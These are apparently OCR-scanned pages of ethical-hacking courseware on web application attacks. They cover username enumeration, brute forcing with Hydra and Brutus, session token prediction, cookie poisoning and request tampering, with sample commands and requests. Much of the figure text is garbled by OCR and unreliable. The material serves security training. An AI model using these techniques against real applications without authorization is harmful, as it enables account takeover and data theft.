FIGURE 13.37: Identify Server-Side Technologies
Module 13 Page 1850
Analyze Web Applications: Identify Server-Side Functionality
s* ci Hi 5!
Examine pagesource and URLs and make an educated guess to determine the internal structure and functionality of web applications
GNU W g e t
h ttp :/ / w w w . g n u .o rg h t t p :/ / w w w . te n m a x . com h ttp :/ / s o ft b y t e la b s .c o m
T o o ls used:
>>
T e le p o rt Pro B la c k W id o w
&
E x a m in e U R L SSL
A
ASPX Platform A
https://www.juggyboy.com/customers.aspx?name=existing%2 0clients&isActive= OSstartDate=20%2Fll%2F2010SendDate=20%2F05%2F201l&showBy=name
Copyright by E&C 01 n a l . All Rights Reserved. Reproduction is Strictly Prohibited.
Analyze Web Applications: Identify Server-side Functionality

Once the server-side technologies are determined, identify the server-side functionality. This helps you to find the potential vulnerabilities in server-side functionalities. Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.
T ools Used:
0 %
W g e t
Source: http://www.gnu.org
GNU W get is for retrieving files using HTTP, HTTPS, and FTP, the most widely-used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X-Windows support, etc.
T elep o rt Pro
Source: http://www.tenmax.com Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and
Module 13 Page 1851
type, and search for keywords. Capable of reading HTML 4.0, CSS 2.0, and DHTML, T Teleport can find all files available on all websites by means of web spidering with server-side image map exploration, automatic dial-up connecting, Java applet support, variable exploration depths, project scheduling, and relinking abilities.
B lackW idow
____ Source: http://softbvtelabs.com BlackWidow scans a site and creates a complete profile of the site's structure, files, external links and even link errors. BlackWidow will download all file types such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf, PHP, CGI, HTM to M IM E types from any websites. Download video and save as many different video formats, such as YouTube, MySpace, Google, MKV, MPEG, AVI, DivX, XviD, MP4, 3GP, W M V , ASF, MOV, QT, VOB, etc. It can now be controlled programmatically using the built-in Script Interpreter. Examine URL
SSL
ASPX Platform
h t t p s : / / w w w .ju g g y b o y . c o m / c u s to m e rs . a s p x ? n a m e = e x is t in g % 2 0 c lie n t s & is A c t iv e = 0 & s t a r tD a te = 2 0 % 2 F ll% 2 F 2 0 1 0 S e n d D a t e = 2 0 % 2 F 0 5 % 2 F 2 0 1 1 & s h o w B y = n a m e
-> Database Column < FIGURE 13.38: BlackWidow
If a page URL starts with https instead of http, then it is known as a SLL certified page. If a page contains an .aspx extension, chances are that the application is written using ASP.NET. If the query string has a parameter named showBY, then you can assume that the application is using a database and displays the data by that value.
Module 13 Page 1852
Analyze Web A pplications: Map the Attack Surface
Urt1fw4
CEH
ilhiul lUtbM
-------------------- ----------------------- --------------------- In f o r m a t io n A tta c k In f o r m a t io n A tta c k ---------------------- --------------------- - H I| Client-Side Validation Injection Attack, Authentication Attack SQL Injection, Data Leakage Directory Traversal Injection Attack Cleartext Communication Error Message Privilege Escalation, Access Controls Data Theft, Session Hijacking Information Leakage
Database Interaction File Upload and Download Display of User-Supplied Data Dynamic Redirects
Cross-Site Scripting Redirection, Header Injection Username Enumeration, Password Brute-Force Session Hijacking, Session Fixation
Email Interaction
Email Injection
Application Codes Third-Party Application Web Server Software
Buffer Overflows Known Vulnerabilities Exploitation Known Vulnerabilities Exploitation
Login
Session State
Copyright by E&C01nal. All Rights Reserved. Reproduction Is Strictly Prohibited.
Analyze Web Applications: M ap the Attack Surface

There are various entry points for attackers to compromise the network, so proper analysis of the attack surface must be done. The mapping of the attack surface includes thorough checking of possible vulnerabilities to launch the attack. The following are the various factors through which an attacker collects the information and plans the kind of attack to be launched.
Module 13 Page 1853
In f o r m a t io n
A tta c k Injection Attack, Authentication Attack SQL Injection, Data Leakage
In f o r m a t io n
A tta c k Privilege Escalation, Access Controls Data Theft, Session Hijacking
!^mmaam
Client-Side Validation Injection Attack
Database Interaction
Cleartext Communication
File Upload and Download Display of User-Supplied Data
Directory Traversal
Error Message
Information Leakage
Cross-Site Scripting
Email Interaction
Email Injection
Dynamic Redirects
Redirection, Header Injection Username Enumeration, Password Brute-Force Session Hijacking, Session Fixation
Application Codes
Buffer Overflows
Login
Third-Party Application
Known Vulnerabilities Exploitation Known Vulnerabilities Exploitation
Session State
W eb Server Software
FIGURE 13.39: Map the Attack Surface
Module 13 Page 1854
Attack W eb Servers
Attack Web Services
Copyright
by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
Web App Hacking Methodology

In web applications, the authentication functionality has many design loopholes such as bad passwords, i.e. short or blank, common dictionary words or names, passwords set the same as user name, and those still set to default values. The attacker can exploit the vulnerabilities in the authentication mechanism for gaining access to the web application or network. The various threats that exploit the weaknesses in the authentication mechanism include network eavesdropping, brute force attacks, dictionary attacks, cookie replay attacks, credential theft, etc.
Module 13 Page 1855
__
Attack A uthentication M echan ism
C EH
Attack Authentication M echanism

U ^ Most of the authentication mechanisms used by web applications have design flaws. If an attacker can identify those design flaws, he or she can easily exploit the flaws and gain unauthorized access. The design flaws include failing to check password strength, insecure transportation of credentials over the Internet, etc. W eb applications usually authenticate their clients or users based on a combination of user name and password. Hence, the authentication mechanism attack involves identifying and exploiting the user name and passwords.
U ser N am e E n u m era tio n

User names can be enumerated in two ways; one is verbose failure messages and the other is predictable user names.
V erbose F a ilu re M essage

' In a typical login system, the user is required to enter two pieces of information, that is, user name and password. In some cases, an application will ask for some more information. If the user is trying to log in and fails, then it can be inferred that at least one of the pieces of the information that is provided by the user is incorrect or inconsistent with the other information provided by the user. The application discloses that particular information that is provided by the user was incorrect or inconsistent; it will be providing ground for an attacker to exploit the application.
Module 13 Page 1856
Example: Account <username> not found
The password provided incorrect Account <username> has been locked out
P re d ic ta b le U ser N am es
Some of the applications automatically generate account user names according to some predictable sequence. This makes it very easy way for the attacker who can discern the sequence for potential exhaustive list of all valid user names.
P assw o rd A ttack s
Passwords are cracked based on: Password functionality exploits Password guessing Brute-force attacks
Session A ttacks
The following are the types of session attacks employed by the attacker to attack the authentication mechanism: Session prediction Session brute-forcing Session poisoning
C ookie E xploitation
The following are the types of cookie exploitation attacks: Cookie poisoning Cookie sniffing Cookie replay
Module 13 Page 1857
U ser N am e E num eration
Urt>fW4
CEH
ItliK4I lUilwt
If login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method
Note: User name enumeration from verbose error messages will fail if the application implements account lockout policy i.e., locks account after a certain number of failed login attempts
Copyright
User Nam e Enumeration

Source: https://wordpress.com User name enumeration helps in guessing login IDs and passwords of users. If the login error states which part of the user name and password are not correct, guess the users of the application using the trial-and-error method. Look at the following picture that shows enumerating user names from verbose failure messages:
Module 13 Page 1858
r d
P r e s s .c o m
r d
P r e s s .c o m
ERROR Invalid email or username Lost vour
cassw erg?
ERROR: The password you entered (or the email or username rmimatthews is incorrect Lost vour password?
Email or username
Email or Username
rini.matthews
Password
rinimatthews
Password
Remember Me
Log In
Remember Me
Log In
Register I Lost vour password? ~ Back to WordPress com
R eg iste r I Lo sty o u rp assw o rd ?

Back to WordPress com
Username rini.matthews does not exist
Username successfully enumerated to rinimatthews
FIGURE 13.40: User Name Enumeration
Note: User name enumeration from verbose error messages will fail if the application implements account lockout policy, i.e., locks the account after a certain number of failed login attempts. Some applications automatically generate account user names based on a sequence (such as userlO l, userl02, etc.), and attackers can determine the sequence and enumerate valid user names.
Module 13 Page 1859
Password Attacks: Password Functionality Exploits
CEH
Determine password change functionality within the application by spidering the application or creating a login account Try random strings for'Old Password', 'New Password', and 'Confirm the New Password' fields and analyze errors to identify vulnerabilities in password change functionality
'Forgot Password' features generally present a challenge to the user; if the number of attempts is not limited, attacker can guess the challenge answer successfully with the help of social engineering Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved
"Remember Me" functions are implemented using a simple persistent cookie, such as RememberUser=jason or a persistent session identifier such as RememberUser=ABY112010 Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms
Copyright by
EC -C auactl. All Rights Reserved. Reproduction is Strictly Prohibited.
Password Attacks: Password Functionality Exploits

Password attacks are the techniques used by the attacker for discovering passwords. Attackers exploit the password functionality so that they can bypass the authentication mechanism.
P assw o rd C h an g in g
Determine password change functionality within the application by spidering the application or creating a login account. Try random strings for Old Password, New Password, and Confirm the New Password fields and analyze errors to identify vulnerabilities in password change functionality.
P assw o rd R ecovery
^ - Forgot Password features generally present a challenge to the user; if the number of attempts is not limited, attackers can guess the challenge answer successfully with the help of social engineering. Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved.
R e m e m b e r M e E xploit
Remember Me functions are implemented using a simple persistent cookie, such as RememberUser=jason or a persistent session identifier such as RememberUser=ABY112010.
Module 13 Page 1860
Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms.
Module 13 Page 1861
Password Attacks: Password G u essing

P assw o rd L ist
Attackers create a list of possible passwords using most commonly used passwords, footprinting target and social engineeringtechniques, and try each password until the correct password is discovered r e
CEH
Too ls
P assw o rd D ic tio n a ry
Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks
Password guessing can be performed manually or using automated tools such as Brutus, THC-Hydra,etc.
% !0 u it
*lout j
Ta1 gl Passwcrts |Tun.ng |0pecific Gtart |
O utojt Hydra v4 * (c) 5 0 0 4 by v a n M a u se r/T H C u s e alloA/Pd only for legal p u rp oses H yda (h ttp / vw .ua Ihc erg) sta rlin g at 2 004-05-17 51:58:52 [DAT AJ 3 2 ta s k s . 1 se rve rs, 4 5 3 8 0 login tries (l:1/p:45380). ~ 1418 tries p e r ta sk [ d a t a ] a r a c k n g s e r \ 1c e ftp on port 21
Target Pa3swcrdc |Tuning | Cpeciffc |Gtart
Username
( U sernam e C U so m a m o Lict test!
P a ssw o rd
<* P a ssv /o ra List Colon separated rile r L e o Colon 6eporatod fllo
(STATUS] 14055.00 Ules/min. 14050 tries In 00:01h. 31324 tcxfoIn 00:0311 [STATUS] 14513.00 tfles/m in. 29020 tries In 00:021). 15354 IcxiOll! 00.0211 [21][Tip] host: 127.0.0.1 login: marc password: success Hyda (Mp.//*#swlHc erg) finished al 2004-05-17 22:01:38 <r1nlshed>
P" Try login a s passw ord
[ 7 Try em pty p a s s w a c ;
Gave Output I
hydra 127.0.0.1 ftp I testuser -P /tmp/pa3slist.1xt -e ns
Copyright by
-
J1 = S
Password Attacks: Password Guessing

Password guessing is a method where an attacker guesses various passwords until he
or she gets the correct passwords by using the following methods: password list, password dictionary, and various tools.
Attackers create a list of possible passwords using most commonly used passwords, footprinting target and social engineering techniques, and trying each password until the correct password is discovered.
P assw o rd D ictio n ary
Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.
Tools U sed for P assw o rd G u essin g

Password guessing can be performed manually or using automated tools such as WebCracker, Brutus, Burp Insider, THC-Hydra, etc.
T H C -H yd ra
Source: http://www.thc.org
Module 13 Page 1862
THC-HYDRA is a network logon cracker that supports many different services. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.
I I I <0 Quit
III |
HydraGTK
[ h If Ih !
Target Passwords Tuning | Specific | Start | Username ( Username C Username List pas sw ora C Password < Password List Cdon seperated file Use Colon seperated tile (7 Try login as password F Try empty password |/tmp/passlist.txt |testuset
Target | Passwords | Tuning | Specific Start Output Hydra v4 1 (c) 2004 by van Hauser / THC use allowed only for legal purposes. Hydra (http/.www.thc org) starting at 2004-05*17 21 ;58:52 [DATA] 32 tasks. 1 servers. 45380 login tries (l:1/p:45380). ~1418 tries per task [DATA] attacking service ftp on port 21 [STATUS] 14056.00 tnes'min, 14056 tries in 00:01h. 31324 todo in 00:03h [STATUS] 14513.00 tnes^min. 29026 tries in 00:02h. 16354 todo in 00:02h [21 ][Tip] host: 127.0.0.1 lo gin: marc password: success Hydra (http / .,www.thc org) finished at 2004-05-17 22:01.38 <flnished>
S ta rlj
S topj
r.ove Output
Clear Output |
fiydra 127.0.0.1 ftp 1 testuser P /tmp/passlist.txt e ns
^ 1ydra 127.0 0.1 ftp 1 marc -P /tmp/passlist.txt e ns -t 32
FIGURE 13.41: THC-Hydra Tool Screenshot
In addition to these tools, Burp Insider is also used for password guessing.
Module 13 Page 1863
Password Attacks: Brute-forcing I CEH
Copyright
by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
Password Attacks: Brute Forcing

w c a v 1 1 Brute force is one of the methods used for cracking passwords. In a brute forcing attack, attackers crack the login passwords by trying all possible values from a set of alphabet, numeric, and special characters. The main limitation of the brute force attack is this is beneficial in identifying small passwords of two characters. Guessing becomes more crucial when the password length is longer and also if it contains letters with both upper and lower case. If numbers and symbols are used, then it might even take more than a few years to guess the password, which is almost practically impossible. Commonly used password cracking tools by attackers include Burp Suite's Intruder, Brutus, Sensepost's Crowbar, etc.
B urp S u ite's In tru d e r

> Source: http://portswigger.net Burp Intruder is a module of BurpSuite. It enables the user to automatize pen testing on web applications.
Module 13 Page 1864
burp suite free edition v1.4.01

burp intruder
\
repeater
window
about
\
intruder
repeater [ sequencer f decoder [ comparer ' options spider
alerts scanner
target
positions j payloads ' options___________________________________ 1.679 616 8.398 080 | brute forcer _________________ j
numDer of payloads: number of requests payload set character set |1
|[36cdefghijklmnopqfstuvwxy20123456789
max length
payload p rocessing rules
to uppercase
FIGURE 13.42: Burp Suite's Intruder Tool Screenshot
B rutus
Source: http://www.hoobie.net Brutus is a remote password cracking tool. Brutus supports HTTP, POP3, FTP, SM B, Telnet, IMAP, NNTP, and many other authentication types. It includes a multi-stage authentication engine and can make 60 simultaneous target connections.
Brutus -AET2 -www.hoobie.net/brutus -(January 2000)
File Tools Help
Tjpe | HTTP (Basic Auth) J | Start | Slep | Cleat | Target |127 0 01
<
Connection Options Port Connections 10 Timeout r J 10 IUse Proxy Deline |
HTTP (Basic) Options Method | HEAD ^ P KeepAive
Authentication Options |7 UseUseiname Usei File | users, txlj Positive Authentication Results Target 127.0.0.1/ 127.0.0.V 1?7nn v Opened user tie containing 6 users. Opened password lile containing 818 Passwords HTTP (Basic Auth) HTTP (Basic Auth)
HTTP IRa ' it A ijlh l
f~
Single User
Browse
Pass Mode (word List Pass Fie |w01ds.txt Biowse
Username admin backup

arlmin
Password academic
flrlriA n
Maximum n u r n h p rn ff l u l h f t n l i c r t f i n na l f p m n t sw i lhp 4 9 0 8
Timeout Reject Auth Sea Throttle Quick Kill
FIGURE 13.43: Brutus Tool Screenshot
Module 13 Page 1865
Copyright by EC-Couactl. All Rights Reserved. Reproduction is Strictly Prohibited.
Session Attacks: Session ID Prediction/Brute Forcing

Every time a user logs in to a particular website, then a session ID is given to the user. This session ID is valid until the session is terminated and a new session ID is provided when the user logs in again. Attackers try to exploit this session ID mechanism by guessing the next session ID after collecting some valid session IDs. In the first step, the attacker collects some valid session ID values by sniffing traffic from authenticated users. 0 Attackers then analyze captured session IDs to determine the session ID generation process such as the structure of session ID, the information that is used to create it, and the encryption or hash algorithm used by the application to protect it. In addition, the attacker can implement a brute force technique to generate and test different values of the session ID until he or she successfully gets access to the application.
Module 13 Page 1866
Vulnerable session generation mechanisms that use session IDs composed by user name or other predictable information, like timestamp or client IP address, can be exploited by easily guessing valid session IDs.
GET httD://lanalna:8180/WebGoat/attack?Sereen-17& men u= 4 10 HTTP/1.1 Ho*t:janaina:8180 User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en*US;rv:1.8.1.4) Gecko/20070515 Firefox/2.0.04 Accept:text/xml,appllcatlon/xml,appllcatlon/xhtmk*ml,text/htmd;q-0.9,text/plain;q=0.8,lmage/png,V,',q=0.5 Referer: http://lanaina: 8180/WebGoat/attack?Screen=17&menu=410 Cookie; JSESSIONID=user01 .......................................................... Authorization: Basic23Vic3Q623Vlc3Q
R e q u e st
Predictable Session Cookie
FIGURE 13.44: Session ID Prediction/Brute Forcing
For certain web applications, the session ID information is usually composed of a string of fixed width. Randomness is essential in order to avoid prediction. From the diagram you can see that the session ID variable is indicated by JSESSIONID and assuming its value as "userOl," which corresponds to the user name. By guessing the new value for it, say as "user 02," it is possible for the attacker to gain unauthorized access to the application.
Module 13 Page 1867
Cookie Exploitation: Cookie Poisoning

If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping Attackers then replay the cookie with the same or altered passwords or session identifiers to bypass web application authentication Attackers can trap cookies using tools such as OWASP Zed Attack Proxy, Burp Suite, etc.
Untifled Session -OWASP ZAP
ile Edit View Analyse Report Tools Hale
dF j 13 Q 1 ?
1 , < 2 >
Brga.Xj
| Requests ) Response ' J M J U j U B i
it t
* M c x ilW S .C !S la de .* r r .2 ; EHK4t A p p lV ebK it/537.4 (KETKL I l k Scckol C fcronc/22.0 .1 2 2 9 .9 4 3 C t r l / 5 3 7 .4 C a c h e -C o n ti01: oax-aoe=0 A cc ep t! / R e re re r: n tc r://in .y o n c c .o c a /? p ^ ;3 Aeeept-Enccding: adeft Acce pt-L an û iq v: cn-U S,n;q^>.9 Accvpt-C hasavt: XSO-S559-1.at-S;<f-C .7 , jq - 0 . 3 c o o k i : a<u1d015s24s9e12sar4e: < u r-1 3 *4 u ~ c m 3 2 Hoats tr.a 4 lQ 1 e za x.co a
Hi-* *I C .: 19 1 1 _1
History 1!.[
Seaicti ^
Alerts
> ote
Current Scans 0
ran >
spioer j*f* .
URJ found during a am
U R1 found bui oul of aart scope
Alerts r 0 0 p o f 0
https://www.owasp.org cunw scaM _* 0 *0

Copyright by
0 wo
EC -C auactl. All Rights Reserved. Reproduction is Strictly Prohibited
Cookie Exploitation: Cookie Poisoning

Cookies frequently transmit sensitive credentials and can be modified with ease to escalate access or assume the identity of another user. Cookies are used to maintain a session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's online experience and obtain unauthorized information. Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the ability to "Remember m e?" and store the user's information in a cookie, so he or she does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. In an attempt to protect cookies, site developers often encode the cookies. Easily reversible encoding methods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give many who view cookies a false sense of security. If the cookie contains passwords or session identifiers, attackers can steal the cookie using techniques such as script injection and eavesdropping. Attackers then replay the cookie with the same or altered
Module 13 Page 1868
Ethical Hacking and Countermeasures Copyright by EC-COlMCil All Rights Reserved. Reproduction is Strictly Prohibited.
passwords or session identifiers to bypass web application authentication. Examples of tools used by the attacker for trapping cookies include O W ASP Zed Attack Proxy, Burp Suite, etc. [ [ O W A SP Zed Attack Proxy Source: https://www.owasp.org O W ASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for testing web applications. It provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
O | ile Edit view Analyse Report Tools Help 1 J td H r i ssi O Q v Q v -*0 b 0 U n title d Sessio n - O W A S P Z A P _1 _1 x 1
f Sites(*! |
f = http // tr adinte y tr yahoo_
f Request1 -* j Response j Break >C ] Header: Text *j Body: Text T (Windows NT 6.2; WOW64) AppleWebKit/537.4 (KHTML, 4 k
User-Agent: Mozilla/5.0 lllce Gecko) Accept: Referer: */* Cache-Control: m a x-age_ 0
C h r o m e / 2 2 .0.1229.94 Safarl/S37.4
http://i n.yahoo.com/?pus en-OS,en;q 0 .8 * * adxf-10846667S16632
Ac c e p t - E n c o d i n g : sdch Accept-Language: Cookie: Host: A c c e p t - C h a r s e t : 1s0-88s9-l,utf-8;q-0.7 , *;q-0.3 adxid-01582450612Saf46; tr.adinterax.com
History Active Scan
[ ^ S p id e r^ : T | [> I I J
Search \ Brute Force -
j [
Break Points Port Scan ] Fuzzer # ]
Alerts Params [ 3 J Output ?
Site: tr adinteraxcom:80 URI found during crawl:
Current Scans:0
URI found but out of crawl scope:
Alerts
1^0
Current Scans
0 0 0
Figure 13.45: OWASP Zed Attack Proxy Tool Screenshot
Module 13 Page 1869
Attack W eb Servers
Attack Web Services
Copyright by

-1 Authorization protects the web applications by giving authority to certain users for accessing the applications and restricting certain users from accessing such applications. Attackers by means of authorization attacks try to gain access to the information resources without proper credentials. The ways to attack authorization schemes are explained on the following slides.
Module 13 Page 1870
A uthorization A ttack
fields that relate to user ID, user name, access group, cost, filenames, file identifiers, etc. ^
Crt1fW 4
CEH
itfciul Nm Im
Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input
Attackers first access web application using low privileged account and then escalate privileges to access protected resources
Q uery String
Hidden Tags
Copyright
Authorization Attack
In an authorization attack, the attacker first finds the lowest privileged account and then logs in as an authentic user and slowly escalates privileges to access protected resources. Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user identifiers, etc. The sources that are used by the attackers in order to perform authorization attacks include uniform resource identifier, parameter tampering, POST data, HTTP headers, query string, cookies, and hidden tags. ID, user name, access group, cost, filenames, file
P a ra m e te r T a m p e rin g
Parameter tampering is an attack that is based on the manipulation of parameters that are exchanged between server and client in order to modify the application data, such as price and quantity of products, permissions and user credentials, etc. This information is usually stored in cookies, URL query strings, or hidden form fields, and that is used to increase in control and application functionality.
l E P P o s t D a t a
Post data often is comprised of authorization and session information, since in most of the applications, the information that is provided by the client must be associated
Module 13 Page 1871
with the session that had provided it. The attacker exploiting vulnerabilities in the post data can easily manipulate the post data and the information in it.
Module 13 Page 1872
HTTP Request Tampering

Q u e r y S t r in g T a m p e r in g J If the query string is visible in the address bar on the browser, the attacker can easily change the string parameter to bypass authorization mechanisms
CEH
http: //www. juggyboy.com/mail. aspx?mailbox=john&company=acme%20con1 https :// juggyshop. com/books/download/852741369 .pdf https://juggybank.com/login/home.jsp?admin=true
J Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters
H T T P H e a d e rs J If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionalities GET http://juggyboy: 8 1 8 0 /Applications/Download?ItemID = 2 0 1 HTTP/1 . 1 Host: janaina: 8 1 8 0 User-Agent: Mozilla/5 . 0 (Window; U; Windows NT 5.2; en-US; rv:1.8.1.4 ) Gecko/ 2 0 0 7 0 5 1 5 Firefox/2.0 . 0 4 Accept: text/xml, application/xml, application/xhtml+xml,text/htmtl;g-0 .9 ,text/plain;g=0 . 8,image/png,*/*g=0. 5 Proxy-Connection: keep-alive Referer: http: //juggyboy: 8 1 8 0 /Applications/Download?Admin = False ltemlD= 201 is not accessible as Admin parameter is set to false, attacker can change it to true and access protected items
Copyright by
HTTP Request Tam pering

Attackers tamper with the HTTP request without using another user's ID. The attacker changes the request in between before the message is received by the intended receiver.
Q u ery String T a m p e rin g

An attacker tampers with the query string when the web applications use query strings to pass on the messages between pages. If the query string is visible in the address bar on the browser, the attacker can easily change the string parameter to bypass authorization mechanisms.
FIGURE 13.46: Query String Tampering
Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.
HTTP H ea d ers
If the application uses the Referrer header for making access control decisions,
Module 13 Page 1873
attackers can modify it to access protected application functionalities.

GET http://juggyboy: 8180/Applications/Download?ItemID = 201 HTTP/1.1 Host: janaina:8180 U3erAgent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.04 Accept: text/xml, application/xml, application/xhtml+xml,tsxt/htmtl;q-0.9,text/plain;q=0.8,image/png,*/*,q=0.5
Proxy-Connection: keep-alive
Referer: http://juggyboy:8180/Applications/Download?Admin = False
FIGURE 13.47: HTTP Headers
ItemID = 201 is not accessible as the Admin parameter is set to false; the attacker can change it to true and access protected items.
Module 13 Page 1874
Inthe first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism The attacker then traps cookies set by the web application, tampers with its parameters using tools, such as OWASP Zed Attack Pro x y, and replay to the application
https://www.owasp.org
Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
i
y ./ .
Authorization Attack: Cookie Param eter Tam pering

Cookie parameter tampering is a method used to tamper with the cookies set by the
web application in order to perform malicious attacks. In the first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism. The attacker then traps cookies set by the web application, tampers with its parameters using tools such as Paros Proxy, and replays to the application. Source: https://www.owasp.org
Module 13 Page 1875
Module 13 Page 1876
Attack W eb Servers
Attack Web Services
Copyright
Web App Hacking Methodology Attack Session M anagem ent M echanism

The session management mechanism is the key security component in most web applications. Since it plays a key role, it has become a prime target for launching malicious attacks against application session management. An attacker breaking the application session management can easily bypass the robust authentication controls and masquerade as another application user without knowing their credentials (user name, passwords). The attacker can even take the entire application under his or her control if he or she compromises an administrative user in this way. The details about the attack session management mechanism are described in detail on the following slides.
Module 13 Page 1877
Session Management Attack
Session M anagem ent Attack

A session management attack is one of the methods used by attackers to compromise a network. Attackers break an application's session management mechanism to bypass the authentication controls and impersonate a privileged application user. A session management attack involves two stages; one is session token generation and the other is exploiting session tokens handling. In order to generate a valid session token, the attacker performs: 0 Session Tokens Prediction Session Tokens Tampering
Once the attacker generates the valid session token, the attacker tries to exploit the session token handling in the following ways: 0 Q Session Hijacking Session Replay Man-ln-The-Middle Attack
Module 13 Page 1878
Attacking Session Token Generation M echanism

W e a k E n c o d in g E x a m p le
EH
https:/ / w w w .juggyboy.com/checkout? SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%6 4%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30

When hex-encoding of an ASCII string
user=jason;app=admin;date=23/ll/201
session token by just changing date and use it for another transaction with server
S e s sio n T o ke n P re d ic tio n
Attackers obtain valid session tokens by sniffing the traffic or legitim ately logging into application and analyzing it for encoding (hex-encoding, Base64) or any pattern If any meaning can be reverse engineered from th e sam ple of session tokens, attackers attem pt to guess th e tokens recently issued to other application users Attackers then make a large num ber of requests w ith the predicted tokens to a session-dependent page to determ ine a valid session token
Copyright by E&CsiMCtl. All Rights Reserved. Reproduction isStrictly Prohibited.
Attacking Session Token Generation M echanism

Attackers steal valid session tokens and then predict the next session token after obtaining the valid session tokens.
G
W eak E n co d in g E x am p le
h t t p s : //www.juggyboy. com/checkout?
SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B% 64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30 W hen hex-encoding of an ASCII string user= jason;app= adm in;date= 23/ll/20l0, the attacker can predict another session token by just changing the date and using it for another transaction with the server.
Session T o k en P red ictio n

Attackers obtain valid session tokens by sniffing the traffic or legitimately logging into application and analyzing it for encoding (hex-encoding, Base64) or any pattern. If any meaning can be reverse engineered from the sample of session tokens, attackers attempt to guess the
Module 13 Page 1879
tokens recently issued to other application users. Attackers then make a large number of requests with the predicted tokens to a session-dependent page to determine a valid session.
Module 13 Page 1880
Attacking Session Tokens Handling M echanism : Session Token Sniffing
r cu
JL ^
!7
Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the secure flag is not set, attackers can replay the cookie to gain unauthorized access to application Attacker can use session cookies to perform session hijacking, session replay, and Man-in-the-Middle attacks
Attacking Session Tokens Handling Mechanism : Session Token Sniffing

Attackers first sniff the network traffic for valid session tokens and then predict the next session token based on the sniffed session token. The attacker uses the predicted session ID to authenticate him or herself with the target web application. Thus, sniffing the valid session token is important in session management attacks. Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the security flag is not set, attackers can replay the cookie to gain unauthorized access to application. Attackers can use session cookies to perform session hijacking, session replay, and man-in-the-middle attacks.
W ire sh a rk
Source: http://www.wireshark.org Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Captured files can be programmatically edited via the command line.
Module 13 Page 1881
k3J
Test(WS).pcapng [Wireshark 1.8.2 (SVN Rev 44520 from/trunk1.8])

Edit yiew Jjo Capture Analyze Statistics Telephony Jo ols Internals Help
st v a a m
Filter No. 18 19 20 21 22 23
ile
B (3
v Expression...
< 3. Q. < 3,
Clear Apply Save
Time Source Destination 3 .9 8 6 1 6 0 0 0 1 0 .0 .0 .2 7 4 . 1 2 5 .2 3 6 .1 6 1 5 .1 5 6 3 4 300 f e 8 0 : : b 9 e a : d O l l : 3 e 0 f f 0 2 : : 1 : 2 5 .6 9 5 6 6 9 0 0 1 0 .0 .0 .2 7 4 .1 2 5 .1 3 5 .1 2 5 5 .7 5 8 3 2 6 0 0 7 4 . 1 2 5 .1 3 5 . 1 2 5 1 0 .0 .0 .2 5. 99963300 f e 8 0 : : 5 d f 8 : C 2 d 8 : 5 b b f f 0 2 : : 1 : 2 7 .0 4 2 4 7 6 0 0 1 0 . 0 . 0 . 5 1 2 3 .1 0 8 . 4 0 . 3 3 1 0 .0 .0 .5 1 2 3 .1 0 8 . 4 0 . 3 3 1 2 3 .1 0 8 . 4 0 . 3 3 1 0 .0 .0 .5 1 0 .0 .0 .5 III
Protocol Length 54 TC P D H C Pv 6 150 TCP 91 TCP 60 DHCPV 6 150 TCP 66 TCP TCP HTTP TCP TC P
Info s e r v ic e - c t r l
> h ttp s
[a c k ]
seq = 38 A ck= 38 w ii
